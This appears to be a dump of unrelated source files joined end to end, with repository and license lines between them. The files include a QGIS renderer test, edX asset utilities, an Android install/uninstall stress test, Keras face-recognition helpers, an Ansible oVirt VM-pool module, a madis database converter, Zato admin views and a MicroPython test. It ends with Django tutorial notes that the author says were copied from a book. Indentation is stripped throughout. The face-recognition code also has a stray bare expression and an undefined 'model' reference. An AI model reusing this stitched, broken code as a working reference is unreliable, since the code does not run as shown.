# Check save and reload from Dom works
doc = QDomDocument()
element = renderer.save(doc, QgsReadWriteContext())
renderer2 = QgsGraduatedSymbolRenderer.create(element, QgsReadWriteContext())
self.assertEqual(
dumpGraduatedRenderer(renderer),
dumpGraduatedRenderer(renderer2),
"Save/create from DOM doesn't replicate renderer properly"
)
# Check sorting
renderer.sortByLabel()
self.assertEqual(
dumpRangeList(renderer.ranges(), labelsOnly=True),
'(0.0 - 0.0,Another range,Second range,Third range,)',
'sortByLabel not correct')
renderer.sortByValue()
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.0000-0.0000,10.0000-25.0000,20.0000-25.5000,25.5000-30.5000,)',
'sortByValue not correct')
renderer.sortByValue(Qt.DescendingOrder)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(25.5000-30.5000,20.0000-25.5000,10.0000-25.0000,0.0000-0.0000,)',
'sortByValue descending not correct')
# Check deleting
renderer.deleteClass(2)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(25.5000-30.5000,20.0000-25.5000,0.0000-0.0000,)',
'deleteClass not correct')
renderer.deleteAllClasses()
self.assertEqual(len(renderer.ranges()), 0, "deleteAllClasses didn't delete all")
# void addClass( QgsSymbol* symbol );
# //! @note available in python bindings as addClassRange
# void addClass( QgsRendererRange range ) /PyName=addClassRange/;
# //! @note available in python bindings as addClassLowerUpper
# void addClass( double lower, double upper ) /PyName=addClassLowerUpper/;
# void deleteClass( int idx );
# void deleteAllClasses();
def testQgsGraduatedSymbolRenderer_3(self):
"""Test QgsGraduatedSymbolRenderer: Reading attribute data, calculating classes """
# Create a renderer
renderer = QgsGraduatedSymbolRenderer()
symbol = createMarkerSymbol()
renderer.setSourceSymbol(symbol.clone())
# Test retrieving data values from a layer
ml = createMemoryLayer((1.2, 0.5, 5.0, 1.0, 1.0, 1.2))
renderer.setClassAttribute("value")
# Equal interval calculations
renderer.updateClasses(ml, renderer.EqualInterval, 3)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.5000-2.0000,2.0000-3.5000,3.5000-5.0000,)',
'Equal interval classification not correct')
# Quantile classes
renderer.updateClasses(ml, renderer.Quantile, 3)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.5000-1.0000,1.0000-1.2000,1.2000-5.0000,)',
'Quantile classification not correct')
renderer.updateClasses(ml, renderer.Quantile, 4)
self.assertEqual(
dumpRangeBreaks(renderer.ranges()),
'(0.5000-1.0000,1.0000-1.1000,1.1000-1.2000,1.2000-5.0000,)',
'Quantile classification not correct')
# Tests still needed
# Other calculation method tests
# createRenderer function
# symbolForFeature correctly selects range
if __name__ == "__main__":
unittest.main()
|
gpl-2.0
|
jjmiranda/edx-platform
|
common/lib/xmodule/xmodule/contentstore/utils.py
|
235
|
1470
|
from xmodule.contentstore.content import StaticContent
from .django import contentstore
def empty_asset_trashcan(course_locs):
'''
    This method will hard delete all assets for the given courses from the trashcan
'''
store = contentstore('trashcan')
for course_loc in course_locs:
# first delete all of the thumbnails
thumbs = store.get_all_content_thumbnails_for_course(course_loc)
for thumb in thumbs:
print "Deleting {0}...".format(thumb)
store.delete(thumb['_id'])
# then delete all of the assets
assets, __ = store.get_all_content_for_course(course_loc)
for asset in assets:
print "Deleting {0}...".format(asset)
store.delete(asset['_id'])
def restore_asset_from_trashcan(location):
'''
This method will restore an asset which got soft deleted and put back in the original course
'''
trash = contentstore('trashcan')
store = contentstore()
loc = StaticContent.get_location_from_path(location)
content = trash.find(loc)
# ok, save the content into the courseware
store.save(content)
# see if there is a thumbnail as well, if so move that as well
if content.thumbnail_location is not None:
try:
thumbnail_content = trash.find(content.thumbnail_location)
store.save(thumbnail_content)
except Exception:
pass # OK if this is left dangling
|
agpl-3.0
|
jacky-young/crosswalk-test-suite
|
stability/stability-iterative-android-tests/iterative/Install_Uninstall_Repeatedly.py
|
2
|
3521
|
#!/usr/bin/env python
#coding=utf-8
#
# Copyright (c) 2015 Intel Corporation.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of works must retain the original copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the original copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this work without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
# OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors:
# Hongjuan, Wang<[email protected]>
import unittest
import os, sys, commands, shutil
import time
import subprocess
reload(sys)
sys.setdefaultencoding( 'utf-8' )
SCRIPT_PATH = os.path.realpath(__file__)
ConstPath = os.path.dirname(SCRIPT_PATH)
def setUp():
global device
#device = 'E6OKCY411012'
device = os.environ.get('DEVICE_ID')
if not device:
print 'Get env error\n'
sys.exit(1)
class TestStabilityIterativeFunctions(unittest.TestCase):
def test_install_uninstall_repeatedly(self):
setUp()
global testName, runtime
testName = 'test_install_uninstall_repeatedly'
runtime = 7200
pre_time = time.time()
sysmon_path = ConstPath + '/sysmon.sh'
sysmon_cmd = sysmon_path + ' ' + testName + ' ' + str(runtime) + ' org.xwalk.iterative'
subprocess.Popen(args=sysmon_cmd, shell=True)
i = 0
while True:
i = i + 1
cmd = 'adb -s ' + device + ' install -r ' + ConstPath + '/../iterative*.apk'
inststatus = commands.getstatusoutput(cmd)
elapsed_time = time.time() - pre_time
if inststatus[0] == 0:
if elapsed_time >= runtime:
#kill process
print i, elapsed_time, 'Process finished'
uninststatus = commands.getstatusoutput('adb -s ' + device + ' uninstall org.xwalk.iterative')
self.assertEquals(uninststatus[0], 0)
break
else:
uninststatus = commands.getstatusoutput('adb -s ' + device + ' uninstall org.xwalk.iterative')
self.assertEquals(uninststatus[0], 0)
print i, elapsed_time, 'Continue'
time.sleep(3)
else:
self.assertFalse(True, 'Install apk failed')
#print 'Install apk failed'
break
if __name__ == '__main__':
unittest.main()
|
bsd-3-clause
|
sunyihuan326/DeltaLab
|
Andrew_NG_learning/class_four/week_four/FR/fr_utils.py
|
1
|
8668
|
#### PART OF THIS CODE IS USING CODE FROM VICTOR SY WANG: https://github.com/iwantooxxoox/Keras-OpenFace/blob/master/utils.py ####
import tensorflow as tf
import numpy as np
import os
import cv2  # used by img_to_encoding() below
from numpy import genfromtxt
from keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate
from keras.models import Model
from keras.layers.normalization import BatchNormalization
from keras.layers.pooling import MaxPooling2D, AveragePooling2D
import h5py
import matplotlib.pyplot as plt
_FLOATX = 'float32'
def variable(value, dtype=_FLOATX, name=None):
v = tf.Variable(np.asarray(value, dtype=dtype), name=name)
_get_session().run(v.initializer)
return v
np.linalg.norm
def shape(x):
return x.get_shape()
def square(x):
return tf.square(x)
def zeros(shape, dtype=_FLOATX, name=None):
return variable(np.zeros(shape), dtype, name)
def concatenate(tensors, axis=-1):
if axis < 0:
axis = axis % len(tensors[0].get_shape())
return tf.concat(axis, tensors)
def LRN2D(x):
return tf.nn.lrn(x, alpha=1e-4, beta=0.75)
def conv2d_bn(x,
layer=None,
cv1_out=None,
cv1_filter=(1, 1),
cv1_strides=(1, 1),
cv2_out=None,
cv2_filter=(3, 3),
cv2_strides=(1, 1),
padding=None):
num = '' if cv2_out == None else '1'
tensor = Conv2D(cv1_out, cv1_filter, strides=cv1_strides, data_format='channels_first', name=layer + '_conv' + num)(
x)
tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer + '_bn' + num)(tensor)
tensor = Activation('relu')(tensor)
if padding == None:
return tensor
tensor = ZeroPadding2D(padding=padding, data_format='channels_first')(tensor)
if cv2_out == None:
return tensor
tensor = Conv2D(cv2_out, cv2_filter, strides=cv2_strides, data_format='channels_first', name=layer + '_conv' + '2')(
tensor)
tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer + '_bn' + '2')(tensor)
tensor = Activation('relu')(tensor)
return tensor
WEIGHTS = [
'conv1', 'bn1', 'conv2', 'bn2', 'conv3', 'bn3',
'inception_3a_1x1_conv', 'inception_3a_1x1_bn',
'inception_3a_pool_conv', 'inception_3a_pool_bn',
'inception_3a_5x5_conv1', 'inception_3a_5x5_conv2', 'inception_3a_5x5_bn1', 'inception_3a_5x5_bn2',
'inception_3a_3x3_conv1', 'inception_3a_3x3_conv2', 'inception_3a_3x3_bn1', 'inception_3a_3x3_bn2',
'inception_3b_3x3_conv1', 'inception_3b_3x3_conv2', 'inception_3b_3x3_bn1', 'inception_3b_3x3_bn2',
'inception_3b_5x5_conv1', 'inception_3b_5x5_conv2', 'inception_3b_5x5_bn1', 'inception_3b_5x5_bn2',
'inception_3b_pool_conv', 'inception_3b_pool_bn',
'inception_3b_1x1_conv', 'inception_3b_1x1_bn',
'inception_3c_3x3_conv1', 'inception_3c_3x3_conv2', 'inception_3c_3x3_bn1', 'inception_3c_3x3_bn2',
'inception_3c_5x5_conv1', 'inception_3c_5x5_conv2', 'inception_3c_5x5_bn1', 'inception_3c_5x5_bn2',
'inception_4a_3x3_conv1', 'inception_4a_3x3_conv2', 'inception_4a_3x3_bn1', 'inception_4a_3x3_bn2',
'inception_4a_5x5_conv1', 'inception_4a_5x5_conv2', 'inception_4a_5x5_bn1', 'inception_4a_5x5_bn2',
'inception_4a_pool_conv', 'inception_4a_pool_bn',
'inception_4a_1x1_conv', 'inception_4a_1x1_bn',
'inception_4e_3x3_conv1', 'inception_4e_3x3_conv2', 'inception_4e_3x3_bn1', 'inception_4e_3x3_bn2',
'inception_4e_5x5_conv1', 'inception_4e_5x5_conv2', 'inception_4e_5x5_bn1', 'inception_4e_5x5_bn2',
'inception_5a_3x3_conv1', 'inception_5a_3x3_conv2', 'inception_5a_3x3_bn1', 'inception_5a_3x3_bn2',
'inception_5a_pool_conv', 'inception_5a_pool_bn',
'inception_5a_1x1_conv', 'inception_5a_1x1_bn',
'inception_5b_3x3_conv1', 'inception_5b_3x3_conv2', 'inception_5b_3x3_bn1', 'inception_5b_3x3_bn2',
'inception_5b_pool_conv', 'inception_5b_pool_bn',
'inception_5b_1x1_conv', 'inception_5b_1x1_bn',
'dense_layer'
]
conv_shape = {
'conv1': [64, 3, 7, 7],
'conv2': [64, 64, 1, 1],
'conv3': [192, 64, 3, 3],
'inception_3a_1x1_conv': [64, 192, 1, 1],
'inception_3a_pool_conv': [32, 192, 1, 1],
'inception_3a_5x5_conv1': [16, 192, 1, 1],
'inception_3a_5x5_conv2': [32, 16, 5, 5],
'inception_3a_3x3_conv1': [96, 192, 1, 1],
'inception_3a_3x3_conv2': [128, 96, 3, 3],
'inception_3b_3x3_conv1': [96, 256, 1, 1],
'inception_3b_3x3_conv2': [128, 96, 3, 3],
'inception_3b_5x5_conv1': [32, 256, 1, 1],
'inception_3b_5x5_conv2': [64, 32, 5, 5],
'inception_3b_pool_conv': [64, 256, 1, 1],
'inception_3b_1x1_conv': [64, 256, 1, 1],
'inception_3c_3x3_conv1': [128, 320, 1, 1],
'inception_3c_3x3_conv2': [256, 128, 3, 3],
'inception_3c_5x5_conv1': [32, 320, 1, 1],
'inception_3c_5x5_conv2': [64, 32, 5, 5],
'inception_4a_3x3_conv1': [96, 640, 1, 1],
'inception_4a_3x3_conv2': [192, 96, 3, 3],
'inception_4a_5x5_conv1': [32, 640, 1, 1, ],
'inception_4a_5x5_conv2': [64, 32, 5, 5],
'inception_4a_pool_conv': [128, 640, 1, 1],
'inception_4a_1x1_conv': [256, 640, 1, 1],
'inception_4e_3x3_conv1': [160, 640, 1, 1],
'inception_4e_3x3_conv2': [256, 160, 3, 3],
'inception_4e_5x5_conv1': [64, 640, 1, 1],
'inception_4e_5x5_conv2': [128, 64, 5, 5],
'inception_5a_3x3_conv1': [96, 1024, 1, 1],
'inception_5a_3x3_conv2': [384, 96, 3, 3],
'inception_5a_pool_conv': [96, 1024, 1, 1],
'inception_5a_1x1_conv': [256, 1024, 1, 1],
'inception_5b_3x3_conv1': [96, 736, 1, 1],
'inception_5b_3x3_conv2': [384, 96, 3, 3],
'inception_5b_pool_conv': [96, 736, 1, 1],
'inception_5b_1x1_conv': [256, 736, 1, 1],
}
def load_weights_from_FaceNet(FRmodel):
# Load weights from csv files (which was exported from Openface torch model)
weights = WEIGHTS
weights_dict = load_weights()
# Set layer weights of the model
for name in weights:
if FRmodel.get_layer(name) != None:
FRmodel.get_layer(name).set_weights(weights_dict[name])
elif model.get_layer(name) != None:
model.get_layer(name).set_weights(weights_dict[name])
def load_weights():
# Set weights path
dirPath = './weights'
fileNames = filter(lambda f: not f.startswith('.'), os.listdir(dirPath))
paths = {}
weights_dict = {}
for n in fileNames:
paths[n.replace('.csv', '')] = dirPath + '/' + n
for name in WEIGHTS:
if 'conv' in name:
conv_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
conv_w = np.reshape(conv_w, conv_shape[name])
conv_w = np.transpose(conv_w, (2, 3, 1, 0))
conv_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
weights_dict[name] = [conv_w, conv_b]
elif 'bn' in name:
bn_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)
bn_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)
bn_m = genfromtxt(paths[name + '_m'], delimiter=',', dtype=None)
bn_v = genfromtxt(paths[name + '_v'], delimiter=',', dtype=None)
weights_dict[name] = [bn_w, bn_b, bn_m, bn_v]
elif 'dense' in name:
dense_w = genfromtxt(dirPath + '/dense_w.csv', delimiter=',', dtype=None)
dense_w = np.reshape(dense_w, (128, 736))
dense_w = np.transpose(dense_w, (1, 0))
dense_b = genfromtxt(dirPath + '/dense_b.csv', delimiter=',', dtype=None)
weights_dict[name] = [dense_w, dense_b]
return weights_dict
def load_dataset():
train_dataset = h5py.File('datasets/train_happy.h5', "r")
train_set_x_orig = np.array(train_dataset["train_set_x"][:]) # your train set features
train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels
test_dataset = h5py.File('datasets/test_happy.h5', "r")
test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels
classes = np.array(test_dataset["list_classes"][:]) # the list of classes
train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
def img_to_encoding(image_path, model):
img1 = cv2.imread(image_path, 1)
img = img1[..., ::-1]
img = np.around(np.transpose(img, (2, 0, 1)) / 255.0, decimals=12)
x_train = np.array([img])
embedding = model.predict_on_batch(x_train)
return embedding
|
mit
|
ashemedai/ansible
|
lib/ansible/modules/cloud/ovirt/ovirt_vmpools.py
|
26
|
7566
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Red Hat, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ovirt_vmpools
short_description: Module to manage VM pools in oVirt
version_added: "2.3"
author: "Ondra Machacek (@machacekondra)"
description:
- "Module to manage VM pools in oVirt."
options:
name:
description:
- "Name of the the VM pool to manage."
required: true
state:
description:
- "Should the VM pool be present/absent."
- "Note that when C(state) is I(absent) all VMs in VM pool are stopped and removed."
choices: ['present', 'absent']
default: present
template:
description:
- "Name of the template, which will be used to create VM pool."
description:
description:
- "Description of the VM pool."
cluster:
description:
- "Name of the cluster, where VM pool should be created."
type:
description:
- "Type of the VM pool. Either manual or automatic."
- "C(manual) - The administrator is responsible for explicitly returning the virtual machine to the pool.
The virtual machine reverts to the original base image after the administrator returns it to the pool."
- "C(Automatic) - When the virtual machine is shut down, it automatically reverts to its base image and
is returned to the virtual machine pool."
- "Default value is set by engine."
choices: ['manual', 'automatic']
vm_per_user:
description:
- "Maximum number of VMs a single user can attach to from this pool."
- "Default value is set by engine."
prestarted:
description:
- "Number of pre-started VMs defines the number of VMs in run state, that are waiting
to be attached to Users."
- "Default value is set by engine."
vm_count:
description:
- "Number of VMs in the pool."
- "Default value is set by engine."
extends_documentation_fragment: ovirt
'''
EXAMPLES = '''
# Examples don't contain auth parameter for simplicity,
# look at ovirt_auth module to see how to reuse authentication:
# Create VM pool from template
- ovirt_vmpools:
cluster: mycluster
name: myvmpool
template: rhel7
vm_count: 2
prestarted: 2
vm_per_user: 1
# Remove vmpool, note that all VMs in pool will be stopped and removed:
- ovirt_vmpools:
state: absent
name: myvmpool
'''
RETURN = '''
id:
description: ID of the VM pool which is managed
returned: On success if VM pool is found.
type: str
sample: 7de90f31-222c-436c-a1ca-7e655bd5b60c
vm_pool:
description: "Dictionary of all the VM pool attributes. VM pool attributes can be found on your oVirt instance
at following url: https://ovirt.example.com/ovirt-engine/api/model#types/vm_pool."
returned: On success if VM pool is found.
'''
try:
import ovirtsdk4.types as otypes
except ImportError:
pass
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ovirt import (
BaseModule,
check_params,
check_sdk,
create_connection,
equal,
get_link_name,
ovirt_full_argument_spec,
wait,
)
class VmPoolsModule(BaseModule):
def build_entity(self):
return otypes.VmPool(
name=self._module.params['name'],
description=self._module.params['description'],
comment=self._module.params['comment'],
cluster=otypes.Cluster(
name=self._module.params['cluster']
) if self._module.params['cluster'] else None,
template=otypes.Template(
name=self._module.params['template']
) if self._module.params['template'] else None,
max_user_vms=self._module.params['vm_per_user'],
prestarted_vms=self._module.params['prestarted'],
size=self._module.params['vm_count'],
type=otypes.VmPoolType(
self._module.params['type']
) if self._module.params['type'] else None,
)
def update_check(self, entity):
return (
equal(self._module.params.get('cluster'), get_link_name(self._connection, entity.cluster)) and
equal(self._module.params.get('description'), entity.description) and
equal(self._module.params.get('comment'), entity.comment) and
equal(self._module.params.get('vm_per_user'), entity.max_user_vms) and
equal(self._module.params.get('prestarted'), entity.prestarted_vms) and
equal(self._module.params.get('vm_count'), entity.size)
)
def main():
argument_spec = ovirt_full_argument_spec(
state=dict(
choices=['present', 'absent'],
default='present',
),
name=dict(default=None, required=True),
template=dict(default=None),
cluster=dict(default=None),
description=dict(default=None),
comment=dict(default=None),
vm_per_user=dict(default=None, type='int'),
prestarted=dict(default=None, type='int'),
vm_count=dict(default=None, type='int'),
type=dict(default=None, choices=['automatic', 'manual']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
check_sdk(module)
check_params(module)
try:
auth = module.params.pop('auth')
connection = create_connection(auth)
vm_pools_service = connection.system_service().vm_pools_service()
vm_pools_module = VmPoolsModule(
connection=connection,
module=module,
service=vm_pools_service,
)
state = module.params['state']
if state == 'present':
ret = vm_pools_module.create()
# Wait for all VM pool VMs to be created:
if module.params['wait']:
vms_service = connection.system_service().vms_service()
for vm in vms_service.list(search='pool=%s' % module.params['name']):
wait(
service=vms_service.service(vm.id),
condition=lambda vm: vm.status in [otypes.VmStatus.DOWN, otypes.VmStatus.UP],
timeout=module.params['timeout'],
)
elif state == 'absent':
ret = vm_pools_module.remove()
module.exit_json(**ret)
except Exception as e:
module.fail_json(msg=str(e), exception=traceback.format_exc())
finally:
connection.close(logout=auth.get('token') is None)
if __name__ == "__main__":
main()
|
gpl-3.0
|
XristosMallios/cache
|
exareme-tools/madis/src/functions/vtable/sdc2db.py
|
4
|
6517
|
import os.path
import sys
import functions
import os
from itertools import repeat, imap
import cPickle
import cStringIO
import vtbase
import struct
import re
import zlib
import apsw
from array import array
import marshal
if hasattr(sys, 'pypy_version_info'):
from __pypy__ import newlist_hint
def izip(*iterables):
# izip('ABCD', 'xy') --> Ax By
iterators = tuple(map(iter, iterables))
ilen = len(iterables)
res = [None] * ilen
while True:
ci = 0
while ci < ilen:
res[ci] = iterators[ci].next()
ci += 1
yield res
else:
from itertools import izip
newlist_hint = lambda size: []
registered=True
def imapm(function, iterable):
# imap(pow, (2,3,10), (5,2,3)) --> 32 9 1000
it = iter(iterable)
while True:
yield function(it.next())
def repeatm(object, times):
for i in xrange(times):
yield object
class SDC2DB(vtbase.VT):
def VTiter(self, *args,**formatArgs):
import msgpack
import bz2
serializer = msgpack
largs, dictargs = self.full_parse(args)
where = None
mode = 'row'
input = cStringIO.StringIO()
if 'file' in dictargs:
where=dictargs['file']
else:
raise functions.OperatorError(__name__.rsplit('.')[-1],"No destination provided")
col = 0
filename, ext=os.path.splitext(os.path.basename(where))
if 'cols' in dictargs:
a = re.split(' |,| , |, | ,' , dictargs['cols'])
column = [x for x in a if x != '']
else:
col = 1
start = 0
end = sys.maxint-1
if 'start' in dictargs:
start = int(dictargs['start'])
if 'end' in dictargs:
end = int(dictargs['end'])
fullpath = str(os.path.abspath(os.path.expandvars(os.path.expanduser(os.path.normcase(where)))))
fileIterlist = []
for x in xrange(start,end+1):
try:
fileIterlist.append(open(fullpath+"."+str(x), "rb"))
except:
break
if fileIterlist == []:
try:
fileIterlist = [open(where, "rb")]
except :
raise functions.OperatorError(__name__.rsplit('.')[-1],"No such file")
cursor = []
for filenum,fileIter in enumerate(fileIterlist):
blocksize = struct.unpack('!i',fileIter.read(4))
b = struct.unpack('!B',fileIter.read(1))
schema = cPickle.load(fileIter)
colnum = len(schema)
if filenum == 0:
yield schema
def createdb(where, tname, schema, page_size=16384):
c=apsw.Connection(where)
cursor=c.cursor()
list(cursor.execute('pragma page_size='+str(page_size)+';pragma cache_size=-1000;pragma legacy_file_format=false;pragma synchronous=0;pragma journal_mode=OFF;PRAGMA locking_mode = EXCLUSIVE'))
create_schema='create table '+tname+' ('
create_schema+='`'+unicode(schema[0][0])+'`'+ (' '+unicode(schema[0][1]) if schema[0][1]!=None else '')
for colname, coltype in schema[1:]:
create_schema+=',`'+unicode(colname)+'`'+ (' '+unicode(coltype) if coltype!=None else '')
create_schema+='); begin exclusive;'
list(cursor.execute(create_schema))
insertquery="insert into "+tname+' values('+','.join(['?']*len(schema))+')'
return c, cursor, insertquery
cur, cursor, insertquery=createdb(where+".db", filename, schema)
input = cStringIO.StringIO()
while True:
input.truncate(0)
try:
blocksize = struct.unpack('!i', fileIter.read(4))
except:
break
if blocksize[0]:
input.write(fileIter.read(blocksize[0]))
input.seek(0)
b = struct.unpack('!B', input.read(1))
if b[0]:
decompression = struct.unpack('!B', input.read(1))
if decompression[0] :
decompress = zlib.decompress
else:
decompress = bz2.decompress
type = '!'+'i'*(colnum*2+1)
ind = list(struct.unpack(type, input.read(4*(colnum*2+1))))
cols = [None]*colnum
for c in xrange(colnum):
s = serializer.loads(decompress(input.read(ind[c*2])))
if (len(s)>1 and ind[c*2+1]==0 and ind[colnum*2]>1):
cols[c] = s
else:
if len(s)==1:
tmp = s[0]
cols[c] = repeat(tmp, ind[colnum*2])
elif len(s)<256:
cols[c] = imap(s.__getitem__, array('B', decompress(input.read(ind[c*2+1]))))
else:
cols[c] = imap(s.__getitem__, array('H', decompress(input.read(ind[c*2+1]))))
# for r in izip(*cols):
# pass
cursor.executemany(insertquery, izip(*cols))
elif not b[0]:
schema = cPickle.load(fileIter)
list(cursor.execute('commit'))
cur.close()
try:
for fileObject in fileIterlist:
fileObject.close()
except NameError:
pass
def Source():
return vtbase.VTGenerator(SDC2DB)
if not ('.' in __name__):
"""
This is needed to be able to test the function, put it at the end of every
new function you create
"""
import sys
import setpath
from functions import *
testfunction()
if __name__ == "__main__":
reload(sys)
sys.setdefaultencoding('utf-8')
import doctest
doctest.testmod()
|
mit
|
AmrnotAmr/zato
|
code/zato-web-admin/src/zato/admin/web/views/security/tls/channel.py
|
6
|
1845
|
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
import logging
# Zato
from zato.admin.web.forms.security.tls.channel import CreateForm, EditForm
from zato.admin.web.views import CreateEdit, Delete as _Delete, Index as _Index
from zato.common.odb.model import TLSChannelSecurity
logger = logging.getLogger(__name__)
class Index(_Index):
output_class = TLSChannelSecurity
url_name = 'security-tls-channel'
template = 'zato/security/tls/channel.html'
service_name = 'zato.security.tls.channel.get-list'
class SimpleIO(_Index.SimpleIO):
input_required = ('cluster_id',)
output_required = ('id', 'name', 'value', 'is_active')
output_repeated = True
def handle(self):
return {
'create_form': CreateForm(),
'edit_form': EditForm(prefix='edit'),
}
class _CreateEdit(CreateEdit):
method_allowed = 'POST'
class SimpleIO(CreateEdit.SimpleIO):
input_required = ('name', 'value', 'is_active')
output_required = ('id', 'name')
def success_message(self, item):
return 'Successfully {} the TLS channel security definition [{}]'.format(self.verb, item.name)
class Create(_CreateEdit):
url_name = 'security-tls-channel-create'
service_name = 'zato.security.tls.channel.create'
class Edit(_CreateEdit):
url_name = 'security-tls-channel-edit'
form_prefix = 'edit-'
service_name = 'zato.security.tls.channel.edit'
class Delete(_Delete):
url_name = 'security-tls-channel-delete'
error_message = 'Could not delete the TLS channel security definition'
service_name = 'zato.security.tls.channel.delete'
|
gpl-3.0
|
mhoffma/micropython
|
tests/basics/with_return.py
|
82
|
1239
|
class CtxMgr:
def __init__(self, id):
self.id = id
def __enter__(self):
print("__enter__", self.id)
return self
def __exit__(self, a, b, c):
print("__exit__", self.id, repr(a), repr(b))
# simple case
def foo():
with CtxMgr(1):
return 4
print(foo())
# for loop within with (iterator needs removing upon return)
def f():
with CtxMgr(1):
for i in [1, 2]:
return i
print(f())
# multiple for loops within with
def f():
with CtxMgr(1):
for i in [1, 2]:
for j in [3, 4]:
return (i, j)
print(f())
# multiple for loops within nested withs
def f():
with CtxMgr(1):
for i in [1, 2]:
for j in [3, 4]:
with CtxMgr(2):
for k in [5, 6]:
for l in [7, 8]:
return (i, j, k, l)
print(f())
# multiple for loops that are optimised, and nested withs
def f():
with CtxMgr(1):
for i in range(1, 3):
for j in range(3, 5):
with CtxMgr(2):
for k in range(5, 7):
for l in range(7, 9):
return (i, j, k, l)
print(f())
|
mit
|
Eslamunto/Gestern-HIG
|
django/book-1/djangobook-1.py
|
1
|
13193
|
MODULE ONE!
Chapter One:
Django's Position on the Web
NOTE: Text in here needs to be paraphrased as it was taken as copy-paste from the book directly.
Django's slogan
The web framework for perfectionists with deadlines.
MVC:
Models: These represent data organization in a database. In simple words,
we can say that each model defines a table in the database and the relations
between other models. It's thanks to them that every bit of data is stored in
the database
Views: These contain all the information that will be sent to the client. They
make views that the final HTML document will generate. We can associate
the HTML code with the views.
Controllers: These contain all the actions performed by the server and are not
visible to the client. The controller checks whether the user is authenticated
or it can generate the HTML code from a template.
<img src="img/1.png"/>
1. The client sends a request to the server asking to display a page.
2. The controller uses a database through models. It can create, read, update,
or delete any record or apply any logic to the retrieved data.
3. The model sends data from the database; for example, it sends a product list
if we have an online shop.
4. The controller injects data into a view to generate it.
5. The view returns its content depending on the data given by the controller.
6. The controller returns the HTML content to the client.
Django, in particular, uses an MVT pattern. In this pattern, views are replaced by
templates and controllers are replaced by views. In the rest of this book, we will be
using MVT patterns. Hence, our HTML code will be templates, and our Python code
will be views and models.
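As a rough, hedged sketch of that flow (the Task model and task_list.html template are placeholders, not taken from the book), a single request could travel through the three layers like this:
# views.py -- illustrative only
from django.shortcuts import render
from .models import Task          # hypothetical model (the "M")
def task_list(request):           # the view (Django's "V", playing the controller role)
    tasks = Task.objects.all()    # the model layer reads the data from the database
    # the template (the "T") turns the data into the final HTML sent to the client
    return render(request, 'task_list.html', {'tasks': tasks})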
Chapter Two:
Creating a Django Project
A django project consists of applications, which are small modules for the project
To be able to use Django, you need to install the following software:
• Python 3, to enjoy the third version innovations.
• setuptools is a module that simplifies the installation of the external
Python module. However, it does not manage to uninstall the module.
• PIP extends the possibilities of setuptools by removing packages,
using easier syntax, and providing other benefits.
• Django, which we are going to install thanks to PIP.
# to install python3
$ sudo apt-get install python3
Installing setuptools for Linux
When using APT, we do not need to install setuptools. Indeed, APT will automatically
install it before installing PIP.
Installing PIP
If you have installed Python 3.4 or later, PIP is included with Python.
for linux;
$ sudo apt-get install python-pip
or
$ sudo apt-get install python3-pip
Installing Django:
$ pip install Django
To start a new django project
$ django-admin startproject Work_manager
To start a new django application:
$ python manage.py startapp TasksManager
Chapter Three:
Hello World! with Django
REGEX:
# The beginning and the end of the line
